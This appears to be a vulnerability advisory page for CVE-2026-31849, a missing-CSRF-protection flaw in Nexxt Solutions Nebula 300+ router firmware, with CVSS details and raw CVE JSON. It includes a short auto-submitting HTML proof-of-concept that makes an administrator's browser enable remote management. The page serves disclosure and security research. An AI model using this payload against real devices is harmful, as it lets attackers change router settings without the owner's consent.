Security Vulnerability Report
中文
CVE-2026-31849 CVSS 6.5 MEDIUM

CVE-2026-31849

Published: 2026-03-23 13:16:31
Last Modified: 2026-04-29 17:43:34
Source: 309f9ea4-e3e9-4c6c-b79d-e8eb01244f2c

Description

Nexxt Solutions Nebula 300+ firmware through version 12.01.01.37 does not implement CSRF protections on state-changing endpoints such as /goform/setSysTools and other administrative interfaces. As a result, an attacker can craft malicious web requests that are executed in the context of an authenticated administrator’s browser, leading to unauthorized configuration changes, including enabling services or modifying system settings.

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N

Configurations (Affected Products)

cpe:2.3:o:nexxtsolutions:nebula300plus_firmware:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:nexxtsolutions:nebula300plus:-:*:*:*:*:*:*:* - NOT VULNERABLE
Nexxt Solutions Nebula 300+ <= 12.01.01.37

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<!-- CSRF PoC for CVE-2026-31849 --> <!-- Target: Nexxt Solutions Nebula 300+ Firmware <= 12.01.01.37 --> <html> <body> <script>history.pushState('', '', '/')</script> <form action="http://<TARGET_IP>/goform/setSysTools" method="POST"> <!-- Example payload to change system settings --> <input type="hidden" name="operation" value="modify_config" /> <input type="hidden" name="setting_name" value="remote_management" /> <input type="hidden" name="setting_value" value="enable" /> <input type="submit" value="Submit request" /> </form> <script> document.forms[0].submit(); </script> </body> </html>

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-31849", "sourceIdentifier": "309f9ea4-e3e9-4c6c-b79d-e8eb01244f2c", "published": "2026-03-23T13:16:30.640", "lastModified": "2026-04-29T17:43:33.623", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Nexxt Solutions Nebula 300+ firmware through version 12.01.01.37 does not implement CSRF protections on state-changing endpoints such as /goform/setSysTools and other administrative interfaces. As a result, an attacker can craft malicious web requests that are executed in the context of an authenticated administrator’s browser, leading to unauthorized configuration changes, including enabling services or modifying system settings."}, {"lang": "es", "value": "El firmware de Nexxt Solutions Nebula 300+ hasta la versión 12.01.01.37 no implementa protecciones CSRF en los endpoints administrativos que cambian el estado. Un atacante remoto puede inducir a un administrador autenticado a enviar solicitudes manipuladas que modifican la configuración del dispositivo, incluyendo la configuración relevante para la seguridad, sin la intención del administrador."}], "metrics": {"cvssMetricV40": [{"source": "309f9ea4-e3e9-4c6c-b79d-e8eb01244f2c", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 7.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "PASSIVE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "309f9ea4-e3e9-4c6c-b79d-e8eb01244f2c", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-352"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:nexxtsolutions:nebula300plus_firmware:*:*:*:*:*:*:*:*", "versionEndIncluding": "12.01.01.37", "matchCriteriaId": "D55E0FD8-9ADB-423B-A23F-64F41F9DD40B"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:nexxtsolutions:nebula300plus:-:*:*:*:*:*:*:*", "matchCriteriaId": "F9AA93D2-E1BA-4EFC-8760-BF366CF6474D"}]}]}], "references": [{"url": "https://nexxt-connectivity-frontend.s3.amazonaws.com/media/docs/Nebula300+_v12.01.01.37.zip", "source": "309f9ea4-e3e9-4c6c-b79d-e8eb01244f2c", "tags": ["Product"]}, {"url": "https://www.nexxtsolutions.com/connectivity/internal-products/ARN02304U6/", "source": "309f9ea4-e3e9-4c6c-b79d-e8eb01244f2c", "tags": ["Product"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.